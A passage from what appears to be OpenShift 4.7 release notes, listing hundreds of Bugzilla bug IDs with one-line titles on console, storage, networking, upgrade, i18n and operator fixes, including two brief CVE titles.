EventSources and Channels tab 1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes 1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference 1908888 - Dualstack does not work with multiple gateways 1908889 - Bump CNO to k8s 1.20 1908891 - TestDNSForwarding DNS operator e2e test is failing frequently 1908914 - CNO: upgrade nodes before masters 1908918 - Pipeline builder yaml view sidebar is not responsive 1908960 - QE - Design Gherkin Scenarios 1908971 - Gherkin Script for pipeline debt 4.7 1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated 1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console 1908998 - [cinder-csi-driver] doesn't detect the credentials change 1909004 - "No datapoints found" for RHEL node's filesystem graph 1909005 - i18n: workloads list view heading is not translated 1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects 1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type 1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware 1909067 - Web terminal should keep latest output when connection closes 1909070 - PLR and TR Logs component is not streaming as fast as tkn 1909092 - Error Message should not confuse user on Channel form 1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page 1909108 - Machine API components should use 1.20 dependencies 1909116 - Catalog Sort Items dropdown is not aligned on Firefox 1909198 - Move Sink action option is not working 1909207 - Accessibility Issue on monitoring page 1909236 - Remove pinned icon overlap on resource name 1909249 - Intermittent packet drop from pod to pod 1909276 - Accessibility Issue on create project modal 1909289 - oc debug of an init container no longer works 1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2 1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle 1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it 1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O 1909464 - Build operator-registry with golang-1.15 1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found 1909521 - Add kubevirt cluster type for e2e-test workflow 1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created 1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node 1909610 - Fix available capacity when no storage class selected 1909678 - scale up / down buttons available on pod details side panel 1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART 1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined 1909739 - Arbiter request data changes 1909744 - cluster-api-provider-openstack: Bump gophercloud 1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline 1909791 - Update standalone kube-proxy config for EndpointSlice 1909792 - Empty states for some details page subcomponents are not i18ned 1909815 - Perspective switcher is only half-i18ned 1909821 - OCS 4.7 LSO installation blocked because of Error "Invalid value: "integer": spec.flexibleScaling in body 1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn't installed in CI 1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing 1909911 - [OVN]EgressFirewall caused a segfault 1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument 1909958 - Support Quick Start Highlights Properly 1909978 - ignore-volume-az = yes not working on standard storageClass 1909981 - Improve statement in template select step 1909992 - Fail to pull the bundle image when using the private index image 1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev 1910036 - QE - Design Gherkin Scenarios ODC-4504 1910049 - UPI: ansible-galaxy is not supported 1910127 - [UPI on oVirt]: Improve UPI Documentation 1910140 - fix the api dashboard with changes in upstream kube 1.20 1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment's containers with the OPERATOR_CONDITION_NAME Environment Variable 1910165 - DHCP to static lease script doesn't handle multiple addresses 1910305 - [Descheduler] - The minKubeVersion should be 1.20.0 1910409 - Notification drawer is not localized for i18n 1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials 1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation 1910501 - Installed Operators->Operand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page 1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work 1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready 1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability 1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded 1910739 - Redfish-virtualmedia (idrac) deploy fails on "The Virtual Media image server is already connected" 1910753 - Support Directory Path to Devfile 1910805 - Missing translation for Pipeline status and breadcrumb text 1910829 - Cannot delete a PVC if the dv's phase is WaitForFirstConsumer 1910840 - Show Nonexistent command info in theoc rollback -hhelp page 1910859 - breadcrumbs doesn't use last namespace 1910866 - Unify templates string 1910870 - Unify template dropdown action 1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6 1911129 - Monitoring charts renders nothing when switching from a Deployment to "All workloads" 1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard 1911212 - [MSTR-998] API Performance Dashboard "Period" drop-down has a choice "$__auto_interval_period" which can bring "1:154: parse error: missing unit character in duration" 1911213 - Wrong and misleading warning for VMs that were created manually (not from template) 1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created 1911269 - waiting for the build message present when build exists 1911280 - Builder images are not detected for Dotnet, Httpd, NGINX 1911307 - Pod Scale-up requires extra privileges in OpenShift web-console 1911381 - "Select Persistent Volume Claim project" shows in customize wizard when select a source available template 1911382 - "source volumeMode (Block) and target volumeMode (Filesystem) do not match" shows in VM Error 1911387 - Hit error - "Cannot read property 'value' of undefined" while creating VM from template 1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation 1911418 - [v2v] The target storage class name is not displayed if default storage class is used 1911434 - git ops empty state page displays icon with watermark 1911443 - SSH Cretifiaction field should be validated 1911465 - IOPS display wrong unit 1911474 - Devfile Application Group Does Not Delete Cleanly (errors) 1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController 1911574 - Expose volume mode on Upload Data form 1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined 1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel 1911656 - using 'operator-sdk run bundle' to install operator successfully, but the command output said 'Failed to run bundle'' 1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state 1911782 - Descheduler should not evict pod used local storage by the PVC 1911796 - uploading flow being displayed before submitting the form 1912066 - The ansible type operator's manager container is not stable when managing the CR 1912077 - helm operator's default rbac forbidden 1912115 - [automation] Analyze job keep failing because of 'JavaScript heap out of memory' 1912237 - Rebase CSI sidecars for 4.7 1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page 1912409 - Fix flow schema deployment 1912434 - Update guided tour modal title 1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken 1912523 - Standalone pod status not updating in topology graph 1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion 1912558 - TaskRun list and detail screen doesn't show Pending status 1912563 - p&f: carry 97206: clean up executing request on panic 1912565 - OLM macOS local build broken by moby/term dependency 1912567 - [OCP on RHV] Node becomes to 'NotReady' status when shutdown vm from RHV UI only on the second deletion 1912577 - 4.1/4.2->4.3->...-> 4.7 upgrade is stuck during 4.6->4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff 1912590 - publicImageRepository not being populated 1912640 - Go operator's controller pods is forbidden 1912701 - Handle dual-stack configuration for NIC IP 1912703 - multiple queries can't be plotted in the same graph under some conditons 1912730 - Operator backed: In-context should support visual connector if SBO is not installed 1912828 - Align High Performance VMs with High Performance in RHV-UI 1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates 1912852 - VM from wizard - available VM templates - "storage" field is "0 B" 1912888 - recycler template should be moved to KCM operator 1912907 - Helm chart repository index can contain unresolvable relative URL's 1912916 - Set external traffic policy to cluster for IBM platform 1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller 1912938 - Update confirmation modal for quick starts 1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment 1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment 1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver 1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver 1912977 - rebase upstream static-provisioner 1913006 - Remove etcd v2 specific alerts with etcd_http* metrics 1913011 - [OVN] Pod's external traffic not use egressrouter macvlan ip as a source ip 1913037 - update static-provisioner base image 1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state 1913085 - Regression OLM uses scoped client for CRD installation 1913096 - backport: cadvisor machine metrics are missing in k8s 1.19 1913132 - The installation of Openshift Virtualization reports success early before it 's succeeded eventually 1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root 1913196 - Guided Tour doesn't handle resizing of browser 1913209 - Support modal should be shown for community supported templates 1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort 1913249 - update info alert this template is not aditable 1913285 - VM list empty state should link to virtualization quick starts 1913289 - Rebase AWS EBS CSI driver for 4.7 1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled 1913297 - Remove restriction of taints for arbiter node 1913306 - unnecessary scroll bar is present on quick starts panel 1913325 - 1.20 rebase for openshift-apiserver 1913331 - Import from git: Fails to detect Java builder 1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used 1913343 - (release-4.7) Added changelog file for insights-operator 1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator 1913371 - Missing i18n key "Administrator" in namespace "console-app" and language "en." 1913386 - users can see metrics of namespaces for which they don't have rights when monitoring own services with prometheus user workloads 1913420 - Time duration setting of resources is not being displayed 1913536 - 4.6.9 -> 4.7 upgrade hangs. RHEL 7.9 worker stuck on "error enabling unit: Failed to execute operation: File exists\\n\" 1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase 1913560 - Normal user cannot load template on the new wizard 1913563 - "Virtual Machine" is not on the same line in create button when logged with normal user 1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table 1913568 - Normal user cannot create template 1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker 1913585 - Topology descriptive text fixes 1913608 - Table data contains data value None after change time range in graph and change back 1913651 - Improved Red Hat image and crashlooping OpenShift pod collection 1913660 - Change location and text of Pipeline edit flow alert 1913685 - OS field not disabled when creating a VM from a template 1913716 - Include additional use of existing libraries 1913725 - Refactor Insights Operator Plugin states 1913736 - Regression: fails to deploy computes when using root volumes 1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes 1913751 - add third-party network plugin test suite to openshift-tests 1913783 - QE-To fix the merging pr issue, commenting the afterEach() block 1913807 - Template support badge should not be shown for community supported templates 1913821 - Need definitive steps about uninstalling descheduler operator 1913851 - Cluster Tasks are not sorted in pipeline builder 1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists 1913951 - Update the Devfile Sample Repo to an Official Repo Host 1913960 - Cluster Autoscaler should use 1.20 dependencies 1913969 - Field dependency descriptor can sometimes cause an exception 1914060 - Disk created from 'Import via Registry' cannot be used as boot disk 1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy 1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks) 1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances 1914125 - Still using /dev/vde as default device path when create localvolume 1914183 - Empty NAD page is missing link to quickstarts 1914196 - target port infrom dockerfileflow does nothing 1914204 - Creating VM from dev perspective may fail with template not found error 1914209 - Associate image secret name to pipeline serviceaccount imagePullSecrets 1914212 - [e2e][automation] Add test to validate bootable disk souce 1914250 - ovnkube-node fails on master nodes when both DHCPv6 and SLAAC addresses are configured on nodes 1914284 - Upgrade to OCP 4.6.9 results in cluster-wide DNS and connectivity issues due to bad NetworkPolicy flows 1914287 - Bring back selfLink 1914301 - User VM Template source should show the same provider as template itself 1914303 - linuxptp-daemon is not forwarding ptp4l stderr output to openshift logs 1914309 - /terminal page when WTO not installed shows nonsensical error 1914334 - order of getting started samples is arbitrary 1914343 - [sig-imageregistry][Feature:ImageTriggers] Annotation trigger reconciles after the image is overwritten [Suite:openshift/conformance/parallel] timeout on s390x 1914349 - Increase and decrease buttons in max and min pods in HPA page has distorted UI 1914405 - Quick search modal should be opened when coming back from a selection 1914407 - Its not clear that node-ca is running as non-root 1914427 - Count of pods on the dashboard is incorrect 1914439 - Typo in SRIOV port create command example 1914451 - cluster-storage-operator pod running as root 1914452 - oc image append, oc image extract outputs wrong suggestion to use --keep-manifest-list=true 1914642 - Customize Wizard Storage tab does not pass validation 1914723 - SamplesTBRInaccessibleOnBoot Alert has a misspelling 1914793 - device names should not be translated 1914894 - Warn about using non-groupified api version 1914926 - webdriver-manager pulls incorrect version of ChomeDriver due to a bug 1914932 - Put correct resource name in relatedObjects 1914938 - PVC disk is not shown on customization wizard general tab 1914941 - VM Template rootdisk is not deleted after fetching default disk bus 1914975 - Collect logs from openshift-sdn namespace 1915003 - No estimate of average node readiness during lifetime of a cluster 1915027 - fix MCS blocking iptables rules 1915041 - s3:ListMultipartUploadParts is relied on implicitly 1915079 - Canary controller should not periodically rotate the canary route endpoint for performance reasons 1915080 - Large number of tcp connections with shiftstack ocp cluster in about 24 hours 1915085 - Pods created and rapidly terminated get stuck 1915114 - [aws-c2s] worker machines are not create during install 1915133 - Missing default pinned nav items in dev perspective 1915176 - Update snapshot API CRDs to v1 in web-console when creating volumesnapshot related resource 1915187 - Remove the "Tech preview" tag in web-console for volumesnapshot 1915188 - Remove HostSubnet anonymization 1915200 - [OCP 4.7+ OCS 4.6]Arbiter related Note should not show up during UI deployment 1915217 - OKD payloads expect to be signed with production keys 1915220 - Remove dropdown workaround for user settings 1915235 - Failed to upgrade to 4.7 from 4.6 due to the machine-config failure 1915262 - When deploying with assisted install the CBO operator is installed and enabled without metal3 pod 1915277 - [e2e][automation]fix cdi upload form test 1915295 - [BM][IP][Dualstack] Installation failed - operators report dial tcp 172.30.0.1:443: i/o timeout 1915304 - Updating scheduling component builder & base images to be consistent with ART 1915312 - Prevent schedule Linux openshift-network-diagnostics pod on Windows node 1915318 - [Metal] bareMetal IPI - cannot interact with toolbox container after first execution only in parallel from different connection 1915348 - [RFE] linuxptp operator needs to expose the uds_address_socket to be used by an application pod 1915357 - Dev Catalog doesn't load anything if virtualization operator is installed 1915379 - New template wizard should require provider and make support input a dropdown type 1915408 - Failure in operator-registry kind e2e test 1915416 - [Descheduler] descheduler evicts pod which does not have any ownerRef or descheduler evict annotation 1915460 - Cluster name size might affect installations 1915500 - [aws c2s] kube-controller-manager crash loops trying to fetch the AWS instance 1915540 - Silent 4.7 RHCOS install failure on ppc64le 1915579 - [Metal] redhat-support-tool became unavailable after tcpdump usage (BareMetal IPI) 1915582 - p&f: carry upstream pr 97860 1915594 - [e2e][automation] Improve test for disk validation 1915617 - Bump bootimage for various fixes 1915624 - "Please fill in the following field: Template provider" blocks customize wizard 1915627 - Translate Guided Tour text. 1915643 - OCP4.6 to 4.7 upgrade failed due to manila csi driver operator sync error 1915647 - Intermittent White screen when the connector dragged to revision 1915649 - "Template support" pop up is not a warning; checkbox text should be rephrased 1915654 - [e2e][automation] Add a verification for Afinity modal should hint "Matching node found" 1915661 - Can't run the 'oc adm prune' command in a pod 1915672 - Kuryr doesn't work with selfLink disabled. 1915674 - Golden image PVC creation - storage size should be taken from the template 1915685 - Message for not supported template is not clear enough 1915760 - Need to increase timeout to wait rhel worker get ready 1915793 - quick starts panel syncs incorrectly across browser windows 1915798 - oauth connection errors for openshift console pods on an OVNKube OCP 4.7 cluster 1915818 - vsphere-problem-detector: use "_totals" in metrics 1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol 1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version 1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0 1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics 1915885 - Kuryr doesn't support workers running on multiple subnets 1915898 - TaskRun log output shows "undefined" in streaming 1915907 - test/cmd/builds.sh uses docker.io 1915912 - sig-storage-csi-snapshotter image not available 1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART 1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard 1915939 - Resizing the browser window removes Web Terminal Icon 1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance] 1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7 1915962 - ROKS: manifest with machine health check fails to apply in 4.7 1915972 - Global configuration breadcrumbs do not work as expected 1915981 - Install ethtool and conntrack in container for debugging 1915995 - "Edit RoleBinding Subject" action under RoleBinding list page kebab actions causes unhandled exception 1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups 1916021 - OLM enters infinite loop if Pending CSV replaces itself 1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry 1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert's annotations 1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk 1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration 1916145 - Explicitly set minimum versions of python libraries 1916164 - Update csi-driver-nfs builder & base images to be consistent with ART 1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7 1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third 1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2 1916379 - error metrics from vsphere-problem-detector should be gauge 1916382 - Can't create ext4 filesystems with Ignition 1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving 'verified: false' even for verified updates 1916401 - Deleting an ingress controller with a bad DNS Record hangs 1916417 - [Kuryr] Must-gather does not have all Custom Resources information 1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image 1916454 - teach CCO about upgradeability from 4.6 to 4.7 1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation 1916502 - Boot disk mirroring fails with mdadm error 1916524 - Two rootdisk shows on storage step 1916580 - Default yaml is broken for VM and VM template 1916621 - oc adm node-logs examples are wrong 1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret. 1916692 - Possibly fails to destroy LB and thus cluster 1916711 - Update Kube dependencies in MCO to 1.20.0 1916747 - remove links to quick starts if virtualization operator isn't updated to 2.6 1916764 - editing a workload with no application applied, will auto fill the app 1916834 - Pipeline Metrics - Text Updates 1916843 - collect logs from openshift-sdn-controller pod 1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed 1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually 1916888 - OCS wizard Donor chart does not get updated whenDevice Typeis edited 1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error "Forbidden: cannot specify lbFloatingIP and apiFloatingIP together" 1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace 1917101 - [UPI on oVirt] - 'RHCOS image' topic isn't located in the right place in UPI document 1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to '"ProxyConfigController" controller failed to sync "key"' error 1917117 - Common templates - disks screen: invalid disk name 1917124 - Custom template - clone existing PVC - the name of the target VM's data volume is hard-coded; only one VM can be created 1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator 1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable. 1917148 - [oVirt] Consume 23-10 ovirt sdk 1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened 1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console 1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory 1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7 1917327 - annotations.message maybe wrong for NTOPodsNotReady alert 1917367 - Refactor periodic.go 1917371 - Add docs on how to use the built-in profiler 1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console 1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui 1917484 - [BM][IPI] Failed to scale down machineset 1917522 - Deprecate --filter-by-os in oc adm catalog mirror 1917537 - controllers continuously busy reconciling operator 1917551 - use min_over_time for vsphere prometheus alerts 1917585 - OLM Operator install page missing i18n 1917587 - Manila CSI operator becomes degraded if user doesn't have permissions to list share types 1917605 - Deleting an exgw causes pods to no longer route to other exgws 1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API 1917656 - Add to Project/application for eventSources from topology shows 404 1917658 - Show TP badge for sources powered by camel connectors in create flow 1917660 - Editing parallelism of job get error info 1917678 - Could not provision pv when no symlink and target found on rhel worker 1917679 - Hide double CTA in admin pipelineruns tab 1917683 -NodeTextFileCollectorScrapeErroralert in OCP 4.6 cluster. 1917759 - Console operator panics after setting plugin that does not exists to the console-operator config 1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0 1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0 1917799 - Gather s list of names and versions of installed OLM operators 1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error 1917814 - Show Broker create option in eventing under admin perspective 1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types 1917872 - [oVirt] rebase on latest SDK 2021-01-12 1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image 1917938 - upgrade version of dnsmasq package 1917942 - Canary controller causes panic in ingress-operator 1918019 - Undesired scrollbars in markdown area of QuickStart 1918068 - Flaky olm integration tests 1918085 - reversed name of job and namespace in cvo log 1918112 - Flavor is not editable if a customize VM is created from cli 1918129 - Update IO sample archive with missing resources & remove IP anonymization from clusteroperator resources 1918132 - i18n: Volume Snapshot Contents menu is not translated 1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2 1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn't be installed on OSP 1918153 - When&character is set as an environment variable in a build config it is getting converted as\u00261918185 - Capitalization on PLR details page 1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections 1918318 - Kamelet connector's are not shown in eventing section under Admin perspective 1918351 - Gather SAP configuration (SCC & ClusterRoleBinding) 1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews 1918395 - [ovirt] increase livenessProbe period 1918415 - MCD nil pointer on dropins 1918438 - [ja_JP, zh_CN] Serverless i18n misses 1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig 1918471 - CustomNoUpgrade Feature gates are not working correctly 1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk 1918622 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART 1918623 - Updating ose-jenkins-agent-nodejs-12 builder & base images to be consistent with ART 1918625 - Updating ose-jenkins-agent-nodejs-10 builder & base images to be consistent with ART 1918635 - Updating openshift-jenkins-2 builder & base images to be consistent with ART #1197 1918639 - Event listener with triggerRef crashes the console 1918648 - Subscription page doesn't show InstallPlan correctly 1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack 1918748 - helmchartrepo is not http(s)_proxy-aware 1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI 1918803 - Need dedicated details page w/ global config breadcrumbs for 'KnativeServing' plugin 1918826 - Insights popover icons are not horizontally aligned 1918879 - need better debug for bad pull secrets 1918958 - The default NMstate instance from the operator is incorrect 1919097 - Close bracket ")" missing at the end of the sentence in the UI 1919231 - quick search modal cut off on smaller screens 1919259 - Make "Add x" singular in Pipeline Builder 1919260 - VM Template list actions should not wrap 1919271 - NM prepender script doesn't support systemd-resolved 1919341 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART 1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry 1919379 - dotnet logo out of date 1919387 - Console login fails with no error when it can't write to localStorage 1919396 - A11y Violation: svg-img-alt on Pod Status ring 1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren't verified 1919750 - Search InstallPlans got Minified React error 1919778 - Upgrade is stuck in insights operator Degraded with "Source clusterconfig could not be retrieved" until insights operator pod is manually deleted 1919823 - OCP 4.7 Internationalization Chinese tranlate issue 1919851 - Visualization does not render when Pipeline & Task share same name 1919862 - The tip information foroc new-project --skip-config-writeis wrong 1919876 - VM created via customize wizard cannot inherit template's PVC attributes 1919877 - Click on KSVC breaks with white screen 1919879 - The toolbox container name is changed from 'toolbox-root' to 'toolbox-' in a chroot environment 1919945 - user entered name value overridden by default value when selecting a git repository 1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference 1919970 - NTO does not update when the tuned profile is updated. 1919999 - Bump Cluster Resource Operator Golang Versions 1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration 1920200 - user-settings network error results in infinite loop of requests 1920205 - operator-registry e2e tests not working properly 1920214 - Bump golang to 1.15 in cluster-resource-override-admission 1920248 - re-running the pipelinerun with pipelinespec crashes the UI 1920320 - VM template field is "Not available" if it's created from common template 1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode isDisk Mode1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs 1920390 - Monitoring > Metrics graph shifts to the left when clicking the "Stacked" option and when toggling data series lines on / off 1920426 - Egress Router CNI OWNERS file should have ovn-k team members 1920427 - Need to updateoc loginhelp page since we don't support prompt interactively for the username 1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time 1920438 - openshift-tuned panics on turning debugging on/off. 1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn 1920481 - kuryr-cni pods using unreasonable amount of CPU 1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof 1920524 - Topology graph crashes adding Open Data Hub operator 1920526 - catalog operator causing CPU spikes and bad etcd performance 1920551 - Boot Order is not editable for Templates in "openshift" namespace 1920555 - bump cluster-resource-override-admission api dependencies 1920571 - fcp multipath will not recover failed paths automatically 1920619 - Remove default scheduler profile value 1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present 1920674 - MissingKey errors in bindings namespace 1920684 - Text in language preferences modal is misleading 1920695 - CI is broken because of bad image registry reference in the Makefile 1920756 - update generic-admission-server library to get the system:masters authorization optimization 1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for "network-check-target" failed when "defaultNodeSelector" is set 1920771 - i18n: Delete persistent volume claim drop down is not translated 1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI 1920912 - Unable to power off BMH from console 1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by "2" 1920984 - [e2e][automation] some menu items names are out dated 1921013 - Gather PersistentVolume definition (if any) used in image registry config 1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior) 1921087 - 'start next quick start' link doesn't work and is unintuitive 1921088 - test-cmd is failing on volumes.sh pretty consistently 1921248 - Clarify the kubelet configuration cr description 1921253 - Text filter default placeholder text not internationalized 1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window 1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo 1921277 - Fix Warning and Info log statements to handle arguments 1921281 - oc get -o yaml --export returns "error: unknown flag: --export" 1921458 - [SDK] Gracefully handle therun bundle-upgradeif the lower version operator doesn't exist 1921556 - [OCS with Vault]: OCS pods didn't comeup after deploying with Vault details from UI 1921572 - For external source (i.e GitHub Source) form view as well shows yaml 1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass 1921610 - Pipeline metrics font size inconsistency 1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1921655 - [OSP] Incorrect error handling during cloudinfo generation 1921713 - [e2e][automation] fix failing VM migration tests 1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view 1921774 - delete application modal errors when a resource cannot be found 1921806 - Explore page APIResourceLinks aren't i18ned 1921823 - CheckBoxControls not internationalized 1921836 - AccessTableRows don't internationalize "User" or "Group" 1921857 - Test flake when hitting router in e2e tests due to one router not being up to date 1921880 - Dynamic plugins are not initialized on console load in production mode 1921911 - Installer PR #4589 is causing leak of IAM role policy bindings 1921921 - "Global Configuration" breadcrumb does not use sentence case 1921949 - Console bug - source code URL broken for gitlab self-hosted repositories 1921954 - Subscription-related constraints in ResolutionFailed events are misleading 1922015 - buttons in modal header are invisible on Safari 1922021 - Nodes terminal page 'Expand' 'Collapse' button not translated 1922050 - [e2e][automation] Improve vm clone tests 1922066 - Cannot create VM from custom template which has extra disk 1922098 - Namespace selection dialog is not closed after select a namespace 1922099 - Updated Readme documentation for QE code review and setup 1922146 - Egress Router CNI doesn't have logging support. 1922267 - Collect specific ADFS error 1922292 - Bump RHCOS boot images for 4.7 1922454 - CRI-O doesn't enable pprof by default 1922473 - reconcile LSO images for 4.8 1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace 1922782 - Source registry missing docker:// in yaml 1922907 - Interop UI Tests - step implementation for updating feature files 1922911 - Page crash when click the "Stacked" checkbox after clicking the data series toggle buttons 1922991 - "verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build" test fails on OKD 